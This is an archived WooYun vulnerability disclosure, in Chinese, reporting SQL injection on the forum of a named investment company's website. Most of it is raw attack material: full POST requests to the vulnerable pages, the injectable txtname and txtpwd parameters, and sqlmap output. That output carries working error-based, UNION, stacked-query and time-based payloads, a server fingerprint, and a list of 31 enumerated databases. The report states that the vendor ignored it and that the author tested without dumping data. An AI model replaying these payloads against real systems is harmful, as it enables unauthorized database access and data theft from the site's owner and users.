乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-05: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-09-19: 厂商已经主动忽略漏洞,细节向公众公开
注入点:
POST /bbs/bbslist.aspx?t=17 HTTP/1.1Content-Length: 749Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.china-galaxy-inv.com/Host: www.china-galaxy-inv.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Button3=%e7%99%bb%e5%bd%95&ge1%24ImageButton1=&ge1%24txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1%24txtpwd=1&top1%24ImageButton1=&top1%24skey=1&txtcontent=1&txtname=t3qA5gbx&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAK6h8yiDgLh4%2bm2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd%2b7q4BwLWlM%2bbAgLz0oe%2bAQLppJj%2bCAKQ2fLiCXD368ohuWU92emfv61CjNe6Q2ln&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFgYCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIOD2QWBgICDw8WAh8BaGRkAgQPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgI0MR4z5pyIMjHml6Xml6k577yaMzDmgLvoo4Hlip4uLi5kAgYPFgIfAmZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRF0b3AxJEltYWdlQnV0dG9uMQUQZ2UxJEltYWdlQnV0dG9uMTuInKqtm%2blpCF6Jw9xgIuMGqvwc
txtname和txtpwd参数
POST /bbs/forget.aspx HTTP/1.1Content-Length: 628Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.china-galaxy-inv.com/Host: www.china-galaxy-inv.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Button1=%e6%8f%90%e4%ba%a4&ge1%24ImageButton1=&ge1%24txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1%24txtpwd=1&top1%24ImageButton1=&top1%24skey=1&txtname=oSdzP2Kk&__EVENTVALIDATION=/wEWCALDwYzWAQLh4%2bm2CQKrjZKaDwLEhISACwKM54rGBgLz0oe%2bAQLppJj%2bCAKQ2fLiCXih7CD4gBIs2hQoGO8oq2YWm4Pe&__VIEWSTATE=/wEPDwULLTEyNjY2MjAyMzkPZBYCAgIPZBYCAgcPZBYGAgIPDxYCHgdWaXNpYmxlaGRkAgQPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgI0MR4z5pyIMjHml6Xml6k577yaMzDmgLvoo4Hlip4uLi5kAgYPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRF0b3AxJEltYWdlQnV0dG9uMQUQZ2UxJEltYWdlQnV0dG9uMWYkSpQqEeji/w4Vct0R0YW7OwlF
txtname参数注入过程
sqlmap identified the following injection points with a total of47 HTTP(s) requests:---Parameter: txtname (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' AND 7666=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7666=7666) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(106)+CHAR(113))) AND 'bOov'='bOov&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE= Type: UNION query Title: Generic UNION query (NULL) - 16 columns Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(69)+CHAR(72)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(105)+CHAR(80)+CHAR(108)+CHAR(69)+CHAR(105)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(106)+CHAR(113),NULL-- &txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE= Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx'; WAITFOR DELAY '0:0:5'--&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' WAITFOR DELAY '0:0:5'--&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=---[01:19:24] [INFO] testing Microsoft SQL Server[01:19:24] [INFO] confirming Microsoft SQL Server[01:19:26] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005
权限:
数据库
available databases [31]:[*] a1014135557[*] AnimationSite[*] anli[*] BaiCaoData[*] ChiHuoData[*] CimatronData[*] CompanyData[*] CusDB[*] dfjrdb[*] DomZoneData[*] doulqdb[*] flowershop[*] futureData[*] hao1317-bd[*] huayanse[*] kangjie[*] LeYuanData[*] LoginSystem[*] master[*] model[*] msdb[*] NanChangMeiShiData[*] public[*] rowsun[*] ShopData[*] SmallHouse[*] tempdb[*] Virgo[*] yidongyun[*] yinhe[*] ZiTengData
列表
过滤只测试漏洞,未脱裤
未能联系到厂商或者厂商积极拒绝